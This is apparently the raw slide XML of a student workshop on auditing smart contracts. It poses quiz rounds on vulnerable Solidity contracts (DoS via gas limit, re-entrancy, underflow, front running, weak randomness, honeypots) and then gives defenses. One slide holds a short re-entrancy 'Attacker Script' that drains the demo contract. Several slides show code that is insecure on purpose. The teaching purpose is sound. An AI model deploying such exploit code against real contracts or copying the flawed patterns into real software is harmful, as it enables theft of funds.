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57" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="260" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="262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4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2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5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7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08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9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7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B23A-92FC-431F-91A0-4DC6E0DEAA34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180A9-F69E-45EF-884E-F3F801BB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8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ensys.github.io/smart-contract-best-practices/known_attacks" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dasp.co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890" y="4441370"/>
            <a:ext cx="11151325" cy="161584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Smart Contract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Vulnerabilities Assessment &amp; Auditing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66" y="757644"/>
            <a:ext cx="3683726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0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194" y="809896"/>
            <a:ext cx="109858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C678DD"/>
                </a:solidFill>
                <a:latin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Payee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addr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uint256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Payee[] payees;</a:t>
            </a:r>
          </a:p>
          <a:p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payOut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payees.length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payees[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].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addr.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>send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(payees[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].value);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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575074" y="640080"/>
            <a:ext cx="207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INSECURE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66218" y="496741"/>
            <a:ext cx="1828800" cy="8098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6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17" y="2868806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Answer</a:t>
            </a:r>
            <a:b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DoS</a:t>
            </a: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With Gas Limit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678DD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1AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Payee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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr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D19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uint256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 value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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Payee[] 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payees;			</a:t>
            </a:r>
            <a:endParaRPr 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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>payOut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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/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C678DD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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>payees.length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) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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payees[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>send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(payees[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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].value);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800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++;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3383280" y="2312125"/>
            <a:ext cx="1867989" cy="2220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6788332" y="3692434"/>
            <a:ext cx="1867989" cy="2220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1086" y="2192326"/>
            <a:ext cx="356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If this gets too long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86949" y="3572635"/>
            <a:ext cx="356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This gets too Expensive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Security against DOS based attacks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57560" cy="49409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Usage of PULL Withdraw method instead of sending the Ethers directly to any address.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Add a Withdraw() function that can be only called by the authorized user.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 gas extensive and uncertain contract calls specify the gas limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contract.call.gas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(50000).value(1)()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to avoid gas scarcity to finish the transaction.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Avoid looping over Arrays in Solidity.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If unavoidable store the Next Value before the line that can cause failure and continue the count from the Next Value.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Estimated Loss: 514,874 ETH (~300 Million USD)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Real World Example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GovernMental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Parity Multi-Sig Wallet Hack 2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partner.call.gas(50000).value(amountToSend)();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07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318" y="2981347"/>
            <a:ext cx="7774577" cy="8416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Round 3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3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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>R3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payable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owner;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mapping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=&gt; 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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor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payable{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owner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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>withdraw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amount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];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56B6C2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(amount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.call.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="56B6C2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(amount)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="98C379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function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external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payable{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000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] +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75074" y="640080"/>
            <a:ext cx="207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INSECURE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66218" y="496741"/>
            <a:ext cx="1828800" cy="8098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17" y="2868806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Hint</a:t>
            </a:r>
            <a:b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Rhymes with Nancy Sounds Fancy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09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755" y="5024178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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Answer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4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>
                <a:solidFill>
                  <a:srgbClr val="BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Re-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Entrancy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22" y="976857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//Attacker Script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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>R3A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R3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 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r3;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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor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payable _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contractAddress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payable{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r3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B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>R3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(_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contractAddress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sendEthToDAO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D19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	address</a:t>
            </a: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(r3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call.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill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).balance)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>""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hackDAO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r3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>withdraw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function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external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payable{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(r3).balance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r3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>withdraw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4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988"/>
            <a:ext cx="12192000" cy="43346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1" y="5555149"/>
            <a:ext cx="254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95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Courtesy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Yos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i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1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Riady</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>who am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4103916" y="1388644"/>
            <a:ext cx="78377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 am Sarang Parikh, pursuing 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> year B.E in Information Science at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nitte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Meenakshi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Institute of Technology, BLR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Currently interning with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consensys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LLC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Love breaking stuff both Software and Hardware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Reported Security Vulnerabilities in Intel, Viber, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jabong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and many more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Filed two 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atents in the field of Brain Computer Interface and Keyboard Dynamics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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bsessed with Hackathons and meetups like this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7" y="1690688"/>
            <a:ext cx="328966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Security against Re-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Entrancy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based attacks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57560" cy="494093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Usage of send() and transfer() instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call.value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2300 gas, throws on failure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Check, Effect and Interactions methodology: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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>withdraw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amount)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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>require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(balances[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]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&gt;=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amount); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// 1. Checks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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balances[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] -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amount; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// 2. Effects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer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(amount); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// 3. Interactions (external contract calls)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Estimated Loss: 3.5M ETH(~50 Million USD) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Real World Example: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DAO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56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318" y="2981347"/>
            <a:ext cx="7774577" cy="8416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Round 4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1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R4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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getBalance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view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C678DD"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	return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];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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer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_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payable _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addr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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>require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] - _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&gt;=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] -</a:t>
            </a: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_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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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[_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addr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] +</a:t>
            </a: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_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external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payable{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] +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75074" y="640080"/>
            <a:ext cx="207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INSECURE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66218" y="496741"/>
            <a:ext cx="1828800" cy="8098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17" y="2868806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Hint</a:t>
            </a:r>
            <a:b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Look Closely.. Under the Functions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8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257" y="2842680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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Answer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4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Arithmetic Underflow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R4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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getBalance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view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C678DD"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	return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];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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer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_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payable _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addr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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>require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&gt;=</a:t>
            </a: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D19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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val</a:t>
            </a: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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>require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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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addr</a:t>
            </a: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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66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&gt;= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill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addr</a:t>
            </a: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]);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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] -</a:t>
            </a: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_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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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[_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addr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] +</a:t>
            </a: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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BBBBBB"/>
                </a:solidFill>
                <a:latin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external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payable{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balanceOf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] +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53896" y="640079"/>
            <a:ext cx="207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SAFE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66218" y="496741"/>
            <a:ext cx="1828800" cy="80989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Security against Arithmetic Flows Attacks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57560" cy="494093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One of the preventive measures are using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenZeppelin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Safe Math</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> library.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It checks for all kinds of Arithmetic attacks and reverts them if any Underflow or Overflow is being caused.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8C379"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>openzeppelin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-solidity/contracts/math/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SafeMath.sol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyContract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using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SafeMath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Real World Example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    The DAO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BatchOverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (multiple tokens)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ProxyOverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (multiple tokens)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partner.call.gas(50000).value(amountToSend)();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8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318" y="2981347"/>
            <a:ext cx="7774577" cy="8416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Round 5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05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678D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FindThisHash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bytes32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constant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hash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0xe9854603c05854a3e142be0c38fd5dcebb289b14ab2788cbc513120b90526ee1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B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor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payable {} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// load with ether</a:t>
            </a:r>
            <a:endParaRPr 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modifier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isWinner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bytes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memory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_s){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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>require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hash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B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keccak256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(_s));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_;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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>solve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bytes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memory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_s)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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isWinner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(_s){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D19A66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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer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C678DD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).balance);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sz="2400" dirty="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75074" y="640080"/>
            <a:ext cx="207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INSECURE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66218" y="496741"/>
            <a:ext cx="1828800" cy="8098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17" y="844063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Hint</a:t>
            </a:r>
            <a:b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96" y="2140632"/>
            <a:ext cx="41814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1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93" y="2853097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Let The Game Begin…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2" y="1472629"/>
            <a:ext cx="4086497" cy="40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257" y="2842680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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Answer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4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Front Running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00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Security against Front Running (Really?)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57560" cy="494093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Two ways to exploit the vulnerability in Real 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Transaction with High Gas Price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Miners </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transaction Order Dependency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Transaction with High Gas Price is easier to execute than Miners Transaction Order Dependency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 stop Transactions with High Gas Price, we can set an upper limit of the Gas Price to be allowed in the Smart Contract using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tx.gasprice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Still it doesn’t stop Miners Transaction Order Dependency, to stop that we can use a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Commit-Reveal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methodology where we first do a transaction(commit) with our answer hash and later in the next transaction we Reveal the answer for the hash where a verification can be done and Front Running can be solved at a greater extent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Real World Impact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Bancor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    ERC-20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TheRun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9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318" y="2981347"/>
            <a:ext cx="7774577" cy="8416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Round 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5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678D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R6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uint256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rn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bytes32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blockHash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uint256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test;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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>play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payable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random_number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B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blockhash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block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-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))%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blockHash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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blockhash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block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number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-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rn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random_number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sz="24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sz="2400" dirty="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75074" y="640080"/>
            <a:ext cx="207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INSECURE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66218" y="496741"/>
            <a:ext cx="1828800" cy="8098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257" y="2842680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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Answer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4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Randomization is Hard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257" y="2842680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Honeypot 1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pragma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>solidity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^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4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200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>23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sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>H1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200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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secretValue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19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>69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200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a: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61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Player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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>playerAddress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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secretValueByUser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; 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sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>play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_secret) </a:t>
            </a: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payable{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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Player </a:t>
            </a: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storage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player;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
